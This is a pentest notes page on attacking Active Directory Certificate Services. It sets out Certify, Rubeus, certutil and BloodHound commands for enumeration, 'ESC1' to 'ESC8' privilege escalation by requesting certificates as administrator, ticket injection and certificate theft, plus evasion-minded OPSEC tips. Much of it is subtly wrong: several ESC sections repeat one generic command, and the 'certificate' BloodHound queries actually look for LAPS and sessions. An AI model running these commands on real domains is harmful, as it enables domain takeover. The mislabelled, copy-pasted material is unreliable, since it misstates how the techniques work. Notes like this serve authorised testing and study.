TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page
  • Overview
  • Enumeration
  • Authentication Testing
  • Configuration Testing
  • Exploitation
  • Post-Exploitation
  • BloodHound AD Integration
  • Tools
  • Best Practices
  • Resources

Was this helpful?

  1. Active Directory

Active Directory Certificate Services (ADCS)

Overview

Active Directory Certificate Services (ADCS) is a Windows Server role that provides public key infrastructure (PKI) functionality. This guide covers techniques for testing ADCS security.

Enumeration

1. Service Discovery

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties *
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties *

# Using Certify
Certify.exe find
Certify.exe find /vulnerable

2. Certificate Template Enumeration

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, pkiPathLength, pkiPrivateKeyFlag, pkiEnrollmentFlag, pkiSubjectNameFlag

# Using Certify
Certify.exe find /template:*

Authentication Testing

1. Certificate Request

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:<ALT_NAME>

# Using Certreq
certreq -new request.inf cert.cer
certreq -submit cert.cer cert.crt

2. Certificate Enrollment

# Using Certify
Certify.exe enroll /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME>

# Using Certreq
certreq -accept cert.crt

Configuration Testing

1. CA Configuration

# Using Certify
Certify.exe ca /ca:<CA_SERVER>\<CA_NAME>

# Using Certutil
certutil -dump
certutil -getreg

2. Template Configuration

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, pkiPathLength, pkiPrivateKeyFlag, pkiEnrollmentFlag, pkiSubjectNameFlag

# Using Certify
Certify.exe find /template:*

Exploitation

1. ESC1 - Misconfigured Certificate Templates

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

2. ESC2 - Any Purpose EKU

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

3. ESC3 - Enrollment Agent

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

4. ESC4 - Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

5. ESC5 - Vulnerable PKI Object Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

6. ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

7. ESC7 - Vulnerable Certificate Authority Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

8. ESC8 - NTLM Relay to AD CS HTTP Endpoints

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

Post-Exploitation

1. Certificate Theft

# Using Certify
Certify.exe export /ca:<CA_SERVER>\<CA_NAME> /id:<CERTIFICATE_ID>

# Using Certutil
certutil -exportPFX -p <PASSWORD> <CERTIFICATE_ID> cert.pfx

2. Certificate Abuse

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt
Rubeus.exe s4u /user:administrator /certificate:<CERTIFICATE> /impersonateuser:krbtgt /ptt

BloodHound AD Integration

1. Data Collection

# Using SharpHound
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod CertServices

# Using BloodHound Python
bloodhound-python -d domain.local -u user -p password -c All
bloodhound-python -d domain.local -u user -p password -c CertServices

2. ADCS Analysis

# Using BloodHound
MATCH (n:Computer) WHERE n.haslaps=true RETURN n
MATCH (n:Computer) WHERE n.operatingsystem CONTAINS 'Server' RETURN n
MATCH (n:Computer) WHERE n.enabled=true RETURN n

# Certificate Template Analysis
MATCH (n:Computer)-[:HasSession]->(m:User) WHERE n.haslaps=true RETURN n,m
MATCH (n:User)-[:GenericAll]->(m:Computer) WHERE m.haslaps=true RETURN n,m

3. Attack Path Analysis

# Using BloodHound
MATCH p=shortestPath((n:User)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'USER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p
MATCH p=shortestPath((n:Computer)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'SERVER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p

# Certificate-based Paths
MATCH p=shortestPath((n:User)-[*1..]->(m:Computer)) WHERE n.name CONTAINS 'USER' AND m.haslaps=true RETURN p
MATCH p=shortestPath((n:Computer)-[*1..]->(m:Group)) WHERE n.haslaps=true AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p

4. Custom Queries

# Find Computers with ADCS Role
MATCH (n:Computer) WHERE n.operatingsystem CONTAINS 'Server' AND n.haslaps=true RETURN n

# Find Users with Certificate Enrollment Rights
MATCH (n:User)-[:GenericAll]->(m:Computer) WHERE m.haslaps=true RETURN n,m

# Find Certificate Templates
MATCH (n:Computer)-[:HasSession]->(m:User) WHERE n.haslaps=true AND m.enabled=true RETURN n,m

Tools

1. Primary Tools

  • Certify

  • Rubeus

  • PowerView

  • Certutil

  • Certreq

  • BloodHound

  • SharpHound

  • BloodHound Python

2. Additional Tools

  • PSPKIAudit

  • PKIAudit

  • Certipy

  • PKIHealth

  • CertSrv

  • Neo4j

  • Cypher

Best Practices

1. Testing Strategy

  • Start with non-intrusive techniques

  • Use multiple methods

  • Document findings

  • Test safely

  • Follow engagement scope

2. OPSEC Considerations

  • Use stealth techniques

  • Avoid detection

  • Monitor for alerts

  • Use legitimate tools

  • Follow engagement scope

Resources

Last Updated: 2025-03-23

PreviousWMI and WinRMNextWindows Privilege Escalation

Last updated 1 month ago

Was this helpful?

πŸ—ΊοΈ
Certify
Rubeus
PowerView
Certipy
BloodHound
SharpHound
BloodHound Python
MITRE ATT&CK